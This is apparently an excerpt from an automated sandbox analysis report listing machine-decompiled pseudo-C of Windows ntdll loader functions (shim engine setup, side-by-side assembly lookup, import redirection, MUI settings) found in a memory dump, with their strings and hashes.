				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x443b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E04336C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x44337c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E0433BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E04384B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E043BE692();
					_t85 =  *0x44337c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E0435E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E04336B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E0436E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x44337c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E043BE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x44337c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x4435d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E04377DF6( *((intOrPtr*)(_t108 + 0xc)));
					E0435D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E04336868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x44337c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x4439208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x4435b24; // 0x2711e28
					asm("ror esi, cl");
					 *0x44391e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E04336565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x04336415
0x04336422
0x0433642e
0x0433642f
0x04336434
0x0433643a
0x0433643b
0x04336440
0x04336446
0x0433644e
0x04336458
0x04336460
0x04336465
0x0433646c
0x04399770
0x04399776
0x04399779
0x043997b3
0x043997b3
0x043997dd
0x043997dd
0x043997e3
0x043997e3
0x04336542
0x04336542
0x0433654a
0x0439982b
0x0439982b
0x04336557
0x04336558
0x04336559
0x04336564
0x04336564
0x0439977b
0x0439977c
0x04399781
0x04399783
0x04399788
0x043997a0
0x043997a0
0x043997a5
0x043997aa
0x043997b0
0x00000000
0x043997b0
0x0433647e
0x0433648b
0x04336498
0x0433649e
0x043997ed
0x043997ed
0x043364a4
0x043364a6
0x043997f7
0x043997fc
0x043997fe
0x043997ce
0x043997d3
0x043997d8
0x043997d8
0x043997db
0x00000000
0x043364ac
0x043364b0
0x043364be
0x043364c3
0x043364cc
0x043364d1
0x043364d8
0x04399802
0x04399808
0x0439980b
0x00000000
0x00000000
0x0439978f
0x04399790
0x04399795
0x04399796
0x0439979b
0x00000000
0x0439979b
0x043364de
0x043364eb
0x043364f1
0x043364f9
0x04336507
0x04336510
0x0433651c
0x04336526
0x0433652c
0x0433653c
0x0439981d
0x0439981d
0x0433653c
0x00000000
0x04336526

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 04399790
apphelp.dll, xrefs: 04336446
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0439977C
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 043997B9
minkernel\ntdll\ldrinit.c, xrefs: 043997A0, 043997C9
LdrpInitShimEngine, xrefs: 04399783, 04399796, 043997BF

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 3cf4afc72674912720439dfc86082adac1a2437fb52e33dbcd5bc2c0cfec7861
Instruction ID: ddd36c253b1330f9aee4a152ddec47e8f8737476bfdb7995cb73474301034b8b
Opcode Fuzzy Hash: 3cf4afc72674912720439dfc86082adac1a2437fb52e33dbcd5bc2c0cfec7861
Instruction Fuzzy Hash: 2A519F71208300AFE620DF24D852BAB77D8EF84B45F00691EE99597660EA34BD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04372594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04372594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x431120c) {
					E043CEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E04372C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E043CEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E0437265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E043CEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E04372919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E043CEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x04372594
0x04372594
0x0437259c
0x043725a6
0x043725a9
0x043725ac
0x043725b6
0x043b1f77
0x00000000
0x043725bc
0x043725bc
0x043725c1
0x043725c3
0x043725c3
0x043725c5
0x043725ce
0x043b1fbc
0x043b1fc1
0x043b1fc2
0x043b1fc3
0x043b1fd1
0x00000000
0x043725e5
0x043725fc
0x04372600
0x043b1f81
0x043b1f82
0x00000000
0x04372606
0x04372606
0x0437260b
0x0437264a
0x0437264a
0x0437260d
0x0437260d
0x04372612
0x04372655
0x04372655
0x04372614
0x04372614
0x04372619
0x00000000
0x0437261b
0x0437261e
0x043b1fa0
0x043b1fa3
0x043b1fb2
0x043b1fd9
0x043b1fd9
0x04372624
0x0437262e
0x04372632
0x043b1f89
0x043b1f8a
0x043b1f8f
0x043b1f8f
0x043b1f91
0x043b1f93
0x04372638
0x0437263e
0x04372643
0x00000000
0x04372645
0x04372648
0x00000000
0x04372648
0x04372643
0x04372632
0x0437261e
0x04372619
0x04372612
0x0437260b
0x04372600
0x043725ce
0x04372652

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 043B1F82
SXS: %s() passed the empty activation context, xrefs: 043B1F6F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 043B1FC9
RtlGetAssemblyStorageRoot, xrefs: 043B1F6A, 043B1FA4, 043B1FC4
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 043B1F8A
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 043B1FA9

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 4b672dead7c175a6358984a0a05d3b66cb946e8b207e2c058856b96d31fec773
Instruction ID: 24b16994e5d5189ea515d9174824411909ab1a9f1fda57db0f184fd76cef101d
Opcode Fuzzy Hash: 4b672dead7c175a6358984a0a05d3b66cb946e8b207e2c058856b96d31fec773
Instruction Fuzzy Hash: 5131CB76B002247BFB305A858C96F9B7668EF41B94F05615AFA4077644D3B0FE00CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0437C5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0437C5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x443b370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x44337c0 & 0x00000005;
					if(( *0x44337c0 & 0x00000005) != 0) {
						E043BE692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E04388F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = E04336B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E0436E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E043C4348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E043619DF(0);
							E04362755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E04361934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E0436270D(_t68);
							E043779F9();
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E043C05C6(_v100, _t68);
								 *0x4435c9c = _v100;
							}
						} else {
							_t52 =  *0x44337c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E043BE692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x44337c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return E04384B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x0437c5ce
0x0437c5d8
0x0437c5ea
0x0437c5f0
0x0437c5f5
0x043b7f71
0x043b7f78
0x043b7f91
0x043b7f96
0x043b7f96
0x043b7fa1
0x043b7fa6
0x043b7fad
0x043b7fb1
0x043b7fbe
0x043b7fc0
0x043b7fc4
0x043b7fca
0x043b7fca
0x043b7fcf
0x043b7fd1
0x043b7fe0
0x043b7fe2
0x043b7fe4
0x043b8022
0x043b8027
0x043b8037
0x043b803b
0x043b803e
0x043b8043
0x043b8044
0x043b8046
0x043b8049
0x043b804a
0x043b804f
0x043b8054
0x043b8056
0x043b8068
0x043b8075
0x043b807d
0x043b8086
0x043b8086
0x043b7fe6
0x043b7fe6
0x043b7feb
0x043b7fed
0x043b8005
0x043b800a
0x043b800f
0x043b800f
0x043b8012
0x043b8014
0x043b801a
0x043b801a
0x043b8014
0x043b7fe4
0x043b7fd1
0x0437c601
0x0437c602
0x0437c603
0x0437c60e

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 043B7FF0
Loading import redirection DLL: '%wZ', xrefs: 043B7F7B
LdrpInitializeProcess, xrefs: 0437C5E4
LdrpInitializeImportRedirection, xrefs: 043B7F82, 043B7FF6
minkernel\ntdll\ldrredirect.c, xrefs: 043B7F8C, 043B8000
minkernel\ntdll\ldrinit.c, xrefs: 0437C5E3

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 8d390e5865c2c1848e21765449460f8d5c6973cffd18771885d18ef8d7ab5570
Instruction ID: 718ad1e18131a0d32eee54f7ecafdd38c17e84dd66c3896400b48c88492d1db0
Opcode Fuzzy Hash: 8d390e5865c2c1848e21765449460f8d5c6973cffd18771885d18ef8d7ab5570
Instruction Fuzzy Hash: 4731E7717047429FE224EF28D846E6AB7D4EF84B14F016558FD856B291E624FC04CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0436510F Relevance: 6.7, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0436510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04368BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04368BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04368BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04368BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04368BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E04355D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E043888C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E0438A8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04385050(0,  &_v68, _t170);
									if(E043656E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04385050(_t257,  &_v68, _t243);
								if(E043656E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E0438A8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E04355D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E043888C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E0438A8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04385050(_t262,  &_v68, _t244);
								if(E043656E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E0438A8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04385050(_t262,  &_v68, _t201);
							if(E043656E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E04355D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E043888C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E0438A8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04385050(_t267,  &_v68, _t245);
							if(E043656E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E0438A8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04385050(_t267,  &_v68, _t224);
						if(E043656E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04365117
0x0436511d
0x0436511f
0x04365121
0x04365124
0x04365127
0x0436512a
0x0436512d
0x04365130
0x04365133
0x04365136
0x0436513a
0x0436513c
0x04365141
0x043ab9ab
0x043ab9b0
0x04365460
0x04365463
0x04365469
0x0436546f
0x04365475
0x0436547b
0x04365481
0x04365484
0x0436548a
0x04365491
0x04365496
0x04365496
0x0436515e
0x043ab9b7
0x043ab9c1
0x043ab9d0
0x043ab9d0
0x043ab9d5
0x043ab9d5
0x0436517b
0x0436518a
0x04365190
0x04365195
0x04365195
0x043651af
0x0436526f
0x04365286
0x04365348
0x0436535f
0x04365446
0x04365446
0x04365449
0x04365449
0x0436544b
0x0436544f
0x043abae9
0x043abae9
0x04365455
0x0436545a
0x043abaf5
0x043abb08
0x043abb0f
0x043abb11
0x043abb14
0x043abb14
0x043abaf5
0x00000000
0x0436545a
0x04365368
0x04365368
0x0436536b
0x04365370
0x043abaa5
0x043abaa7
0x04365376
0x04365387
0x04365389
0x0436538c
0x0436538c
0x04365391
0x043abaaf
0x043abab2
0x00000000
0x04365397
0x0436539c
0x043653a4
0x043653b2
0x043653b5
0x043653b8
0x043653fc
0x043653fc
0x04365404
0x0436540b
0x0436541f
0x04365421
0x04365421
0x0436541f
0x04365424
0x043ababf
0x043abacc
0x043abad1
0x043abad4
0x0436542a
0x0436542a
0x0436542a
0x0436542c
0x04365431
0x0436543e
0x0436543e
0x04365443
0x00000000
0x04365443
0x043653ba
0x043653bd
0x043653bf
0x043653c2
0x043653ca
0x043653de
0x043653e0
0x043653e0
0x043653e7
0x043653ee
0x043653f1
0x043653f2
0x043653f6
0x043653f9
0x00000000
0x043653f9
0x04365391
0x0436528f
0x0436528f
0x04365292
0x04365297
0x043aba41
0x043aba43
0x0436529d
0x043652ae
0x043652b0
0x043652b3
0x043652b3
0x043652b8
0x043aba4b
0x043aba4e
0x00000000
0x043652be
0x043652c3
0x043652c8
0x043652cb
0x043652ce
0x043652dd
0x043652e0
0x043652e3
0x043aba58
0x043aba5b
0x043aba5d
0x043aba60
0x043aba68
0x043aba7c
0x043aba7e
0x043aba7e
0x043aba85
0x043aba8c
0x043aba8f
0x043aba90
0x043aba94
0x043aba97
0x043aba97
0x043652e9
0x043652ec
0x043652f1
0x043652f8
0x0436530c
0x043aba9f
0x043aba9f
0x0436530c
0x04365314
0x04365323
0x04365328
0x0436532b
0x0436532b
0x0436532e
0x04365333
0x04365340
0x04365340
0x04365345
0x00000000
0x04365345
0x043652b8
0x043651b8
0x043651b8
0x043651bb
0x043651c0
0x043ab9dd
0x043651c6
0x043651d2
0x043651d7
0x043651d9
0x043651dc
0x043651dc
0x043651e1
0x043ab9e5
0x043ab9e7
0x043ab9ec
0x00000000
0x043651e7
0x043651ec
0x043651f1
0x043651f4
0x04365204
0x04365207
0x0436520a
0x043ab9f4
0x043ab9f7
0x043ab9f9
0x043ab9fc
0x043aba04
0x043aba18
0x043aba1a
0x043aba1a
0x043aba21
0x043aba28
0x043aba2b
0x043aba2c
0x043aba30
0x043aba33
0x043aba33
0x04365210
0x04365213
0x04365218
0x0436521f
0x04365233
0x043aba3b
0x043aba3b
0x04365233
0x0436523b
0x0436524a
0x0436524f
0x04365252
0x04365252
0x04365255
0x0436525a
0x04365267
0x04365267
0x0436526c
0x00000000
0x0436526c

Strings

Kernel-MUI-Language-Disallowed, xrefs: 04365272
Kernel-MUI-Number-Allowed, xrefs: 04365167
WindowsExcludedProcs, xrefs: 0436514A
Kernel-MUI-Language-SKU, xrefs: 0436534B
Kernel-MUI-Language-Allowed, xrefs: 0436519B

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 2ba4ca79adf8194cb309bc35dbec4b2a359b8acbc8ef32ea0c6e4ad467d526b5
Instruction ID: a92297d5452758ec248cc757980fac80e8e2e6b93885fdea202850291cb54e1b
Opcode Fuzzy Hash: 2ba4ca79adf8194cb309bc35dbec4b2a359b8acbc8ef32ea0c6e4ad467d526b5
Instruction Fuzzy Hash: CCF13D72D41219EFDB15DF98D940EAEBBB8EF08754F14506AE902A7214E774BE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0436D6D0 Relevance: 6.4, Strings: 5, Instructions: 151
COMMON

Download Yara Rule

